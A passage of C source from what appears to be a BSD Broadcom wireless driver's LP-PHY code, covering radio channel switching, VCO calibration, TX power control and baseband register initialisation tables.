timeoutref, tmp[6]; uint16_t old, scale, tmp16; int i, div; for (i = 0; i < N(bwn_b2063_chantable); i++) { if (bwn_b2063_chantable[i].bc_chan == chan) { bc = &bwn_b2063_chantable[i]; break; } } if (bc == NULL) return (EINVAL); BWN_RF_WRITE(mac, BWN_B2063_LOGEN_VCOBUF1, bc->bc_data[0]); BWN_RF_WRITE(mac, BWN_B2063_LOGEN_MIXER2, bc->bc_data[1]); BWN_RF_WRITE(mac, BWN_B2063_LOGEN_BUF2, bc->bc_data[2]); BWN_RF_WRITE(mac, BWN_B2063_LOGEN_RCCR1, bc->bc_data[3]); BWN_RF_WRITE(mac, BWN_B2063_A_RX_1ST3, bc->bc_data[4]); BWN_RF_WRITE(mac, BWN_B2063_A_RX_2ND1, bc->bc_data[5]); BWN_RF_WRITE(mac, BWN_B2063_A_RX_2ND4, bc->bc_data[6]); BWN_RF_WRITE(mac, BWN_B2063_A_RX_2ND7, bc->bc_data[7]); BWN_RF_WRITE(mac, BWN_B2063_A_RX_PS6, bc->bc_data[8]); BWN_RF_WRITE(mac, BWN_B2063_TX_RF_CTL2, bc->bc_data[9]); BWN_RF_WRITE(mac, BWN_B2063_TX_RF_CTL5, bc->bc_data[10]); BWN_RF_WRITE(mac, BWN_B2063_PA_CTL11, bc->bc_data[11]); old = BWN_RF_READ(mac, BWN_B2063_COM15); BWN_RF_SET(mac, BWN_B2063_COM15, 0x1e); freqxtal = siba_get_cc_pmufreq(sc->sc_dev) * 1000; freqvco = bc->bc_freq << ((bc->bc_freq > 4000) ? 1 : 2); freqref = freqxtal * 3; div = (freqxtal <= 26000000 ? 
1 : 2); timeout = ((((8 * freqxtal) / (div * 5000000)) + 1) >> 1) - 1; timeoutref = ((((8 * freqxtal) / (div * (timeout + 1))) + 999999) / 1000000) + 1; BWN_RF_WRITE(mac, BWN_B2063_JTAG_VCO_CALIB3, 0x2); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_VCO_CALIB6, 0xfff8, timeout >> 2); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_VCO_CALIB7, 0xff9f,timeout << 5); BWN_RF_WRITE(mac, BWN_B2063_JTAG_VCO_CALIB5, timeoutref); val[0] = bwn_phy_lp_roundup(freqxtal, 1000000, 16); val[1] = bwn_phy_lp_roundup(freqxtal, 1000000 * div, 16); val[2] = bwn_phy_lp_roundup(freqvco, 3, 16); count = (bwn_phy_lp_roundup(val[2], val[1] + 16, 16) * (timeout + 1) * (timeoutref + 1)) - 1; BWN_RF_SETMASK(mac, BWN_B2063_JTAG_VCO_CALIB7, 0xf0, count >> 8); BWN_RF_WRITE(mac, BWN_B2063_JTAG_VCO_CALIB8, count & 0xff); tmp[0] = ((val[2] * 62500) / freqref) << 4; tmp[1] = ((val[2] * 62500) % freqref) << 4; while (tmp[1] >= freqref) { tmp[0]++; tmp[1] -= freqref; } BWN_RF_SETMASK(mac, BWN_B2063_JTAG_SG1, 0xffe0, tmp[0] >> 4); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_SG2, 0xfe0f, tmp[0] << 4); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_SG2, 0xfff0, tmp[0] >> 16); BWN_RF_WRITE(mac, BWN_B2063_JTAG_SG3, (tmp[1] >> 8) & 0xff); BWN_RF_WRITE(mac, BWN_B2063_JTAG_SG4, tmp[1] & 0xff); BWN_RF_WRITE(mac, BWN_B2063_JTAG_LF1, 0xb9); BWN_RF_WRITE(mac, BWN_B2063_JTAG_LF2, 0x88); BWN_RF_WRITE(mac, BWN_B2063_JTAG_LF3, 0x28); BWN_RF_WRITE(mac, BWN_B2063_JTAG_LF4, 0x63); tmp[2] = ((41 * (val[2] - 3000)) /1200) + 27; tmp[3] = bwn_phy_lp_roundup(132000 * tmp[0], 8451, 16); if ((tmp[3] + tmp[2] - 1) / tmp[2] > 60) { scale = 1; tmp[4] = ((tmp[3] + tmp[2]) / (tmp[2] << 1)) - 8; } else { scale = 0; tmp[4] = ((tmp[3] + (tmp[2] >> 1)) / tmp[2]) - 8; } BWN_RF_SETMASK(mac, BWN_B2063_JTAG_CP2, 0xffc0, tmp[4]); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_CP2, 0xffbf, scale << 6); tmp[5] = bwn_phy_lp_roundup(100 * val[0], val[2], 16) * (tmp[4] * 8) * (scale + 1); if (tmp[5] > 150) tmp[5] = 0; BWN_RF_SETMASK(mac, BWN_B2063_JTAG_CP3, 0xffe0, tmp[5]); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_CP3, 0xffdf, scale << 5); BWN_RF_SETMASK(mac, BWN_B2063_JTAG_XTAL_12, 0xfffb, 0x4); if (freqxtal > 26000000) BWN_RF_SET(mac, BWN_B2063_JTAG_XTAL_12, 0x2); else BWN_RF_MASK(mac, BWN_B2063_JTAG_XTAL_12, 0xfd); if (val[0] == 45) BWN_RF_SET(mac, BWN_B2063_JTAG_VCO1, 0x2); else BWN_RF_MASK(mac, BWN_B2063_JTAG_VCO1, 0xfd); BWN_RF_SET(mac, BWN_B2063_PLL_SP2, 0x3); DELAY(1); BWN_RF_MASK(mac, BWN_B2063_PLL_SP2, 0xfffc); /* VCO Calibration */ BWN_RF_MASK(mac, BWN_B2063_PLL_SP1, ~0x40); tmp16 = BWN_RF_READ(mac, BWN_B2063_JTAG_CALNRST) & 0xf8; BWN_RF_WRITE(mac, BWN_B2063_JTAG_CALNRST, tmp16); DELAY(1); BWN_RF_WRITE(mac, BWN_B2063_JTAG_CALNRST, tmp16 | 0x4); DELAY(1); BWN_RF_WRITE(mac, BWN_B2063_JTAG_CALNRST, tmp16 | 0x6); DELAY(1); BWN_RF_WRITE(mac, BWN_B2063_JTAG_CALNRST, tmp16 | 0x7); DELAY(300); BWN_RF_SET(mac, BWN_B2063_PLL_SP1, 0x40); BWN_RF_WRITE(mac, BWN_B2063_COM15, old); return (0); } static int bwn_phy_lp_b2062_switch_channel(struct bwn_mac *mac, uint8_t chan) { struct bwn_softc *sc = mac->mac_sc; struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; const struct bwn_b206x_chan *bc = NULL; uint32_t freqxtal = siba_get_cc_pmufreq(sc->sc_dev) * 1000; uint32_t tmp[9]; int i; for (i = 0; i < N(bwn_b2062_chantable); i++) { if (bwn_b2062_chantable[i].bc_chan == chan) { bc = &bwn_b2062_chantable[i]; break; } } if (bc == NULL) return (EINVAL); BWN_RF_SET(mac, BWN_B2062_S_RFPLLCTL14, 0x04); BWN_RF_WRITE(mac, BWN_B2062_N_LGENATUNE0, bc->bc_data[0]); BWN_RF_WRITE(mac, BWN_B2062_N_LGENATUNE2, bc->bc_data[1]); BWN_RF_WRITE(mac, 
BWN_B2062_N_LGENATUNE3, bc->bc_data[2]); BWN_RF_WRITE(mac, BWN_B2062_N_TX_TUNE, bc->bc_data[3]); BWN_RF_WRITE(mac, BWN_B2062_S_LGENG_CTL1, bc->bc_data[4]); BWN_RF_WRITE(mac, BWN_B2062_N_LGENACTL5, bc->bc_data[5]); BWN_RF_WRITE(mac, BWN_B2062_N_LGENACTL6, bc->bc_data[6]); BWN_RF_WRITE(mac, BWN_B2062_N_TX_PGA, bc->bc_data[7]); BWN_RF_WRITE(mac, BWN_B2062_N_TX_PAD, bc->bc_data[8]); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL33, 0xcc); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL34, 0x07); bwn_phy_lp_b2062_reset_pllbias(mac); tmp[0] = freqxtal / 1000; tmp[1] = plp->plp_div * 1000; tmp[2] = tmp[1] * ieee80211_ieee2mhz(chan, 0); if (ieee80211_ieee2mhz(chan, 0) < 4000) tmp[2] *= 2; tmp[3] = 48 * tmp[0]; tmp[5] = tmp[2] / tmp[3]; tmp[6] = tmp[2] % tmp[3]; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL26, tmp[5]); tmp[4] = tmp[6] * 0x100; tmp[5] = tmp[4] / tmp[3]; tmp[6] = tmp[4] % tmp[3]; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL27, tmp[5]); tmp[4] = tmp[6] * 0x100; tmp[5] = tmp[4] / tmp[3]; tmp[6] = tmp[4] % tmp[3]; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL28, tmp[5]); tmp[4] = tmp[6] * 0x100; tmp[5] = tmp[4] / tmp[3]; tmp[6] = tmp[4] % tmp[3]; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL29, tmp[5] + ((2 * tmp[6]) / tmp[3])); tmp[7] = BWN_RF_READ(mac, BWN_B2062_S_RFPLLCTL19); tmp[8] = ((2 * tmp[2] * (tmp[7] + 1)) + (3 * tmp[0])) / (6 * tmp[0]); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL23, (tmp[8] >> 8) + 16); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL24, tmp[8] & 0xff); bwn_phy_lp_b2062_vco_calib(mac); if (BWN_RF_READ(mac, BWN_B2062_S_RFPLLCTL3) & 0x10) { BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL33, 0xfc); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL34, 0); bwn_phy_lp_b2062_reset_pllbias(mac); bwn_phy_lp_b2062_vco_calib(mac); if (BWN_RF_READ(mac, BWN_B2062_S_RFPLLCTL3) & 0x10) { BWN_RF_MASK(mac, BWN_B2062_S_RFPLLCTL14, ~0x04); return (EIO); } } BWN_RF_MASK(mac, BWN_B2062_S_RFPLLCTL14, ~0x04); return (0); } static void bwn_phy_lp_set_anafilter(struct bwn_mac *mac, uint8_t channel) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; uint16_t tmp = (channel == 14); if (mac->mac_phy.rev < 2) { BWN_PHY_SETMASK(mac, BWN_PHY_LP_PHY_CTL, 0xfcff, tmp << 9); if ((mac->mac_phy.rev == 1) && (plp->plp_rccap)) bwn_phy_lp_set_rccap(mac); return; } BWN_RF_WRITE(mac, BWN_B2063_TX_BB_SP3, 0x3f); } static void bwn_phy_lp_set_gaintbl(struct bwn_mac *mac, uint32_t freq) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t iso, tmp[3]; KASSERT(mac->mac_phy.rev < 2, ("%s:%d: fail", __func__, __LINE__)); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) iso = plp->plp_txisoband_m; else if (freq <= 5320) iso = plp->plp_txisoband_l; else if (freq <= 5700) iso = plp->plp_txisoband_m; else iso = plp->plp_txisoband_h; tmp[0] = ((iso - 26) / 12) << 12; tmp[1] = tmp[0] + 0x1000; tmp[2] = tmp[0] + 0x2000; bwn_tab_write_multi(mac, BWN_TAB_2(13, 0), 3, tmp); bwn_tab_write_multi(mac, BWN_TAB_2(12, 0), 3, tmp); } static void bwn_phy_lp_digflt_save(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; int i; static const uint16_t addr[] = { BWN_PHY_OFDM(0xc1), BWN_PHY_OFDM(0xc2), BWN_PHY_OFDM(0xc3), BWN_PHY_OFDM(0xc4), BWN_PHY_OFDM(0xc5), BWN_PHY_OFDM(0xc6), BWN_PHY_OFDM(0xc7), BWN_PHY_OFDM(0xc8), BWN_PHY_OFDM(0xcf), }; static const uint16_t val[] = { 0xde5e, 0xe832, 0xe331, 0x4d26, 0x0026, 0x1420, 0x0020, 0xfe08, 0x0008, }; for (i = 0; i < N(addr); i++) { plp->plp_digfilt[i] = BWN_PHY_READ(mac, addr[i]); BWN_PHY_WRITE(mac, addr[i], val[i]); } } static void 
bwn_phy_lp_get_txpctlmode(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; uint16_t ctl; ctl = BWN_PHY_READ(mac, BWN_PHY_TX_PWR_CTL_CMD); switch (ctl & BWN_PHY_TX_PWR_CTL_CMD_MODE) { case BWN_PHY_TX_PWR_CTL_CMD_MODE_OFF: plp->plp_txpctlmode = BWN_PHYLP_TXPCTL_OFF; break; case BWN_PHY_TX_PWR_CTL_CMD_MODE_SW: plp->plp_txpctlmode = BWN_PHYLP_TXPCTL_ON_SW; break; case BWN_PHY_TX_PWR_CTL_CMD_MODE_HW: plp->plp_txpctlmode = BWN_PHYLP_TXPCTL_ON_HW; break; default: plp->plp_txpctlmode = BWN_PHYLP_TXPCTL_UNKNOWN; device_printf(sc->sc_dev, "unknown command mode\n"); break; } } static void bwn_phy_lp_set_txpctlmode(struct bwn_mac *mac, uint8_t mode) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; uint16_t ctl; uint8_t old; bwn_phy_lp_get_txpctlmode(mac); old = plp->plp_txpctlmode; if (old == mode) return; plp->plp_txpctlmode = mode; if (old != BWN_PHYLP_TXPCTL_ON_HW && mode == BWN_PHYLP_TXPCTL_ON_HW) { BWN_PHY_SETMASK(mac, BWN_PHY_TX_PWR_CTL_CMD, 0xff80, plp->plp_tssiidx); BWN_PHY_SETMASK(mac, BWN_PHY_TX_PWR_CTL_NNUM, 0x8fff, ((uint16_t)plp->plp_tssinpt << 16)); /* disable TX GAIN override */ if (mac->mac_phy.rev < 2) BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xfeff); else { BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xff7f); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xbfff); } BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVR, 0xffbf); plp->plp_txpwridx = -1; } if (mac->mac_phy.rev >= 2) { if (mode == BWN_PHYLP_TXPCTL_ON_HW) BWN_PHY_SET(mac, BWN_PHY_OFDM(0xd0), 0x2); else BWN_PHY_MASK(mac, BWN_PHY_OFDM(0xd0), 0xfffd); } /* writes TX Power Control mode */ switch (plp->plp_txpctlmode) { case BWN_PHYLP_TXPCTL_OFF: ctl = BWN_PHY_TX_PWR_CTL_CMD_MODE_OFF; break; case BWN_PHYLP_TXPCTL_ON_HW: ctl = BWN_PHY_TX_PWR_CTL_CMD_MODE_HW; break; case BWN_PHYLP_TXPCTL_ON_SW: ctl = BWN_PHY_TX_PWR_CTL_CMD_MODE_SW; break; default: ctl = 0; KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } BWN_PHY_SETMASK(mac, BWN_PHY_TX_PWR_CTL_CMD, (uint16_t)~BWN_PHY_TX_PWR_CTL_CMD_MODE, ctl); } static void bwn_phy_lp_bugfix(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; const unsigned int size = 256; struct bwn_txgain tg; uint32_t rxcomp, txgain, coeff, rfpwr, *tabs; uint16_t tssinpt, tssiidx, value[2]; uint8_t mode; int8_t txpwridx; tabs = (uint32_t *)malloc(sizeof(uint32_t) * size, M_DEVBUF, M_NOWAIT | M_ZERO); if (tabs == NULL) { device_printf(sc->sc_dev, "failed to allocate buffer.\n"); return; } bwn_phy_lp_get_txpctlmode(mac); mode = plp->plp_txpctlmode; txpwridx = plp->plp_txpwridx; tssinpt = plp->plp_tssinpt; tssiidx = plp->plp_tssiidx; bwn_tab_read_multi(mac, (mac->mac_phy.rev < 2) ? BWN_TAB_4(10, 0x140) : BWN_TAB_4(7, 0x140), size, tabs); bwn_phy_lp_tblinit(mac); bwn_phy_lp_bbinit(mac); bwn_phy_lp_txpctl_init(mac); bwn_phy_lp_rf_onoff(mac, 1); bwn_phy_lp_set_txpctlmode(mac, BWN_PHYLP_TXPCTL_OFF); bwn_tab_write_multi(mac, (mac->mac_phy.rev < 2) ? 
BWN_TAB_4(10, 0x140) : BWN_TAB_4(7, 0x140), size, tabs); BWN_WRITE_2(mac, BWN_CHANNEL, plp->plp_chan); plp->plp_tssinpt = tssinpt; plp->plp_tssiidx = tssiidx; bwn_phy_lp_set_anafilter(mac, plp->plp_chan); if (txpwridx != -1) { /* set TX power by index */ plp->plp_txpwridx = txpwridx; bwn_phy_lp_get_txpctlmode(mac); if (plp->plp_txpctlmode != BWN_PHYLP_TXPCTL_OFF) bwn_phy_lp_set_txpctlmode(mac, BWN_PHYLP_TXPCTL_ON_SW); if (mac->mac_phy.rev >= 2) { rxcomp = bwn_tab_read(mac, BWN_TAB_4(7, txpwridx + 320)); txgain = bwn_tab_read(mac, BWN_TAB_4(7, txpwridx + 192)); tg.tg_pad = (txgain >> 16) & 0xff; tg.tg_gm = txgain & 0xff; tg.tg_pga = (txgain >> 8) & 0xff; tg.tg_dac = (rxcomp >> 28) & 0xff; bwn_phy_lp_set_txgain(mac, &tg); } else { rxcomp = bwn_tab_read(mac, BWN_TAB_4(10, txpwridx + 320)); txgain = bwn_tab_read(mac, BWN_TAB_4(10, txpwridx + 192)); BWN_PHY_SETMASK(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL, 0xf800, (txgain >> 4) & 0x7fff); bwn_phy_lp_set_txgain_dac(mac, txgain & 0x7); bwn_phy_lp_set_txgain_pa(mac, (txgain >> 24) & 0x7f); } bwn_phy_lp_set_bbmult(mac, (rxcomp >> 20) & 0xff); /* set TX IQCC */ value[0] = (rxcomp >> 10) & 0x3ff; value[1] = rxcomp & 0x3ff; bwn_tab_write_multi(mac, BWN_TAB_2(0, 80), 2, value); coeff = bwn_tab_read(mac, (mac->mac_phy.rev >= 2) ? BWN_TAB_4(7, txpwridx + 448) : BWN_TAB_4(10, txpwridx + 448)); bwn_tab_write(mac, BWN_TAB_2(0, 85), coeff & 0xffff); if (mac->mac_phy.rev >= 2) { rfpwr = bwn_tab_read(mac, BWN_TAB_4(7, txpwridx + 576)); BWN_PHY_SETMASK(mac, BWN_PHY_RF_PWR_OVERRIDE, 0xff00, rfpwr & 0xffff); } bwn_phy_lp_set_txgain_override(mac); } if (plp->plp_rccap) bwn_phy_lp_set_rccap(mac); bwn_phy_lp_set_antenna(mac, plp->plp_antenna); bwn_phy_lp_set_txpctlmode(mac, mode); free(tabs, M_DEVBUF); } static void bwn_phy_lp_digflt_restore(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; int i; static const uint16_t addr[] = { BWN_PHY_OFDM(0xc1), BWN_PHY_OFDM(0xc2), BWN_PHY_OFDM(0xc3), BWN_PHY_OFDM(0xc4), BWN_PHY_OFDM(0xc5), BWN_PHY_OFDM(0xc6), BWN_PHY_OFDM(0xc7), BWN_PHY_OFDM(0xc8), BWN_PHY_OFDM(0xcf), }; for (i = 0; i < N(addr); i++) BWN_PHY_WRITE(mac, addr[i], plp->plp_digfilt[i]); } static void bwn_phy_lp_tblinit(struct bwn_mac *mac) { uint32_t freq = ieee80211_ieee2mhz(bwn_phy_lp_get_default_chan(mac), 0); if (mac->mac_phy.rev < 2) { bwn_phy_lp_tblinit_r01(mac); bwn_phy_lp_tblinit_txgain(mac); bwn_phy_lp_set_gaintbl(mac, freq); return; } bwn_phy_lp_tblinit_r2(mac); bwn_phy_lp_tblinit_txgain(mac); } struct bwn_wpair { uint16_t reg; uint16_t value; }; struct bwn_smpair { uint16_t offset; uint16_t mask; uint16_t set; }; static void bwn_phy_lp_bbinit_r2(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const struct bwn_wpair v1[] = { { BWN_PHY_AFE_DAC_CTL, 0x50 }, { BWN_PHY_AFE_CTL, 0x8800 }, { BWN_PHY_AFE_CTL_OVR, 0 }, { BWN_PHY_AFE_CTL_OVRVAL, 0 }, { BWN_PHY_RF_OVERRIDE_0, 0 }, { BWN_PHY_RF_OVERRIDE_2, 0 }, { BWN_PHY_OFDM(0xf9), 0 }, { BWN_PHY_TR_LOOKUP_1, 0 } }; static const struct bwn_smpair v2[] = { { BWN_PHY_OFDMSYNCTHRESH0, 0xff00, 0xb4 }, { BWN_PHY_DCOFFSETTRANSIENT, 0xf8ff, 0x200 }, { BWN_PHY_DCOFFSETTRANSIENT, 0xff00, 0x7f }, { BWN_PHY_GAINDIRECTMISMATCH, 0xff0f, 0x40 }, { BWN_PHY_PREAMBLECONFIRMTO, 0xff00, 0x2 } }; static const struct bwn_smpair v3[] = { { BWN_PHY_OFDM(0xfe), 0xffe0, 0x1f }, { BWN_PHY_OFDM(0xff), 0xffe0, 0xc }, { BWN_PHY_OFDM(0x100), 0xff00, 0x19 }, { BWN_PHY_OFDM(0xff), 0x03ff, 
0x3c00 }, { BWN_PHY_OFDM(0xfe), 0xfc1f, 0x3e0 }, { BWN_PHY_OFDM(0xff), 0xffe0, 0xc }, { BWN_PHY_OFDM(0x100), 0x00ff, 0x1900 }, { BWN_PHY_CLIPCTRTHRESH, 0x83ff, 0x5800 }, { BWN_PHY_CLIPCTRTHRESH, 0xffe0, 0x12 }, { BWN_PHY_GAINMISMATCH, 0x0fff, 0x9000 }, }; int i; for (i = 0; i < N(v1); i++) BWN_PHY_WRITE(mac, v1[i].reg, v1[i].value); BWN_PHY_SET(mac, BWN_PHY_ADC_COMPENSATION_CTL, 0x10); for (i = 0; i < N(v2); i++) BWN_PHY_SETMASK(mac, v2[i].offset, v2[i].mask, v2[i].set); BWN_PHY_MASK(mac, BWN_PHY_CRSGAIN_CTL, ~0x4000); BWN_PHY_MASK(mac, BWN_PHY_CRSGAIN_CTL, ~0x2000); BWN_PHY_SET(mac, BWN_PHY_OFDM(0x10a), 0x1); if (siba_get_pci_revid(sc->sc_dev) >= 0x18) { bwn_tab_write(mac, BWN_TAB_4(17, 65), 0xec); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x10a), 0xff01, 0x14); } else { BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0x10a), 0xff01, 0x10); } BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xdf), 0xff00, 0xf4); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xdf), 0x00ff, 0xf100); BWN_PHY_WRITE(mac, BWN_PHY_CLIPTHRESH, 0x48); BWN_PHY_SETMASK(mac, BWN_PHY_HIGAINDB, 0xff00, 0x46); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xe4), 0xff00, 0x10); BWN_PHY_SETMASK(mac, BWN_PHY_PWR_THRESH1, 0xfff0, 0x9); BWN_PHY_MASK(mac, BWN_PHY_GAINDIRECTMISMATCH, ~0xf); BWN_PHY_SETMASK(mac, BWN_PHY_VERYLOWGAINDB, 0x00ff, 0x5500); BWN_PHY_SETMASK(mac, BWN_PHY_CLIPCTRTHRESH, 0xfc1f, 0xa0); BWN_PHY_SETMASK(mac, BWN_PHY_GAINDIRECTMISMATCH, 0xe0ff, 0x300); BWN_PHY_SETMASK(mac, BWN_PHY_HIGAINDB, 0x00ff, 0x2a00); if ((siba_get_chipid(sc->sc_dev) == 0x4325) && (siba_get_chiprev(sc->sc_dev) == 0)) { BWN_PHY_SETMASK(mac, BWN_PHY_LOWGAINDB, 0x00ff, 0x2100); BWN_PHY_SETMASK(mac, BWN_PHY_VERYLOWGAINDB, 0xff00, 0xa); } else { BWN_PHY_SETMASK(mac, BWN_PHY_LOWGAINDB, 0x00ff, 0x1e00); BWN_PHY_SETMASK(mac, BWN_PHY_VERYLOWGAINDB, 0xff00, 0xd); } for (i = 0; i < N(v3); i++) BWN_PHY_SETMASK(mac, v3[i].offset, v3[i].mask, v3[i].set); if ((siba_get_chipid(sc->sc_dev) == 0x4325) && (siba_get_chiprev(sc->sc_dev) == 0)) { bwn_tab_write(mac, BWN_TAB_2(0x08, 0x14), 0); bwn_tab_write(mac, BWN_TAB_2(0x08, 0x12), 0x40); } if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { BWN_PHY_SET(mac, BWN_PHY_CRSGAIN_CTL, 0x40); BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xf0ff, 0xb00); BWN_PHY_SETMASK(mac, BWN_PHY_SYNCPEAKCNT, 0xfff8, 0x6); BWN_PHY_SETMASK(mac, BWN_PHY_MINPWR_LEVEL, 0x00ff, 0x9d00); BWN_PHY_SETMASK(mac, BWN_PHY_MINPWR_LEVEL, 0xff00, 0xa1); BWN_PHY_MASK(mac, BWN_PHY_IDLEAFTERPKTRXTO, 0x00ff); } else BWN_PHY_MASK(mac, BWN_PHY_CRSGAIN_CTL, ~0x40); BWN_PHY_SETMASK(mac, BWN_PHY_CRS_ED_THRESH, 0xff00, 0xb3); BWN_PHY_SETMASK(mac, BWN_PHY_CRS_ED_THRESH, 0x00ff, 0xad00); BWN_PHY_SETMASK(mac, BWN_PHY_INPUT_PWRDB, 0xff00, plp->plp_rxpwroffset); BWN_PHY_SET(mac, BWN_PHY_RESET_CTL, 0x44); BWN_PHY_WRITE(mac, BWN_PHY_RESET_CTL, 0x80); BWN_PHY_WRITE(mac, BWN_PHY_AFE_RSSI_CTL_0, 0xa954); BWN_PHY_WRITE(mac, BWN_PHY_AFE_RSSI_CTL_1, 0x2000 | ((uint16_t)plp->plp_rssigs << 10) | ((uint16_t)plp->plp_rssivc << 4) | plp->plp_rssivf); if ((siba_get_chipid(sc->sc_dev) == 0x4325) && (siba_get_chiprev(sc->sc_dev) == 0)) { BWN_PHY_SET(mac, BWN_PHY_AFE_ADC_CTL_0, 0x1c); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_CTL, 0x00ff, 0x8800); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_ADC_CTL_1, 0xfc3c, 0x0400); } bwn_phy_lp_digflt_save(mac); } static void bwn_phy_lp_bbinit_r01(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const struct bwn_smpair v1[] = { { BWN_PHY_CLIPCTRTHRESH, 0xffe0, 0x0005 }, { 
BWN_PHY_CLIPCTRTHRESH, 0xfc1f, 0x0180 }, { BWN_PHY_CLIPCTRTHRESH, 0x83ff, 0x3c00 }, { BWN_PHY_GAINDIRECTMISMATCH, 0xfff0, 0x0005 }, { BWN_PHY_GAIN_MISMATCH_LIMIT, 0xffc0, 0x001a }, { BWN_PHY_CRS_ED_THRESH, 0xff00, 0x00b3 }, { BWN_PHY_CRS_ED_THRESH, 0x00ff, 0xad00 } }; static const struct bwn_smpair v2[] = { { BWN_PHY_TR_LOOKUP_1, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_1, 0x3f00, 0x0900 }, { BWN_PHY_TR_LOOKUP_2, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_2, 0xc0ff, 0x0b00 }, { BWN_PHY_TR_LOOKUP_3, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_3, 0xc0ff, 0x0400 }, { BWN_PHY_TR_LOOKUP_4, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_4, 0xc0ff, 0x0b00 }, { BWN_PHY_TR_LOOKUP_5, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_5, 0xc0ff, 0x0900 }, { BWN_PHY_TR_LOOKUP_6, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_6, 0xc0ff, 0x0b00 }, { BWN_PHY_TR_LOOKUP_7, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_7, 0xc0ff, 0x0900 }, { BWN_PHY_TR_LOOKUP_8, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_8, 0xc0ff, 0x0b00 } }; static const struct bwn_smpair v3[] = { { BWN_PHY_TR_LOOKUP_1, 0xffc0, 0x0001 }, { BWN_PHY_TR_LOOKUP_1, 0xc0ff, 0x0400 }, { BWN_PHY_TR_LOOKUP_2, 0xffc0, 0x0001 }, { BWN_PHY_TR_LOOKUP_2, 0xc0ff, 0x0500 }, { BWN_PHY_TR_LOOKUP_3, 0xffc0, 0x0002 }, { BWN_PHY_TR_LOOKUP_3, 0xc0ff, 0x0800 }, { BWN_PHY_TR_LOOKUP_4, 0xffc0, 0x0002 }, { BWN_PHY_TR_LOOKUP_4, 0xc0ff, 0x0a00 } }; static const struct bwn_smpair v4[] = { { BWN_PHY_TR_LOOKUP_1, 0xffc0, 0x0004 }, { BWN_PHY_TR_LOOKUP_1, 0xc0ff, 0x0800 }, { BWN_PHY_TR_LOOKUP_2, 0xffc0, 0x0004 }, { BWN_PHY_TR_LOOKUP_2, 0xc0ff, 0x0c00 }, { BWN_PHY_TR_LOOKUP_3, 0xffc0, 0x0002 }, { BWN_PHY_TR_LOOKUP_3, 0xc0ff, 0x0100 }, { BWN_PHY_TR_LOOKUP_4, 0xffc0, 0x0002 }, { BWN_PHY_TR_LOOKUP_4, 0xc0ff, 0x0300 } }; static const struct bwn_smpair v5[] = { { BWN_PHY_TR_LOOKUP_1, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_1, 0xc0ff, 0x0900 }, { BWN_PHY_TR_LOOKUP_2, 0xffc0, 0x000a }, { BWN_PHY_TR_LOOKUP_2, 0xc0ff, 0x0b00 }, { BWN_PHY_TR_LOOKUP_3, 0xffc0, 0x0006 }, { BWN_PHY_TR_LOOKUP_3, 0xc0ff, 0x0500 }, { BWN_PHY_TR_LOOKUP_4, 0xffc0, 0x0006 }, { BWN_PHY_TR_LOOKUP_4, 0xc0ff, 0x0700 } }; int i; uint16_t tmp, tmp2; BWN_PHY_MASK(mac, 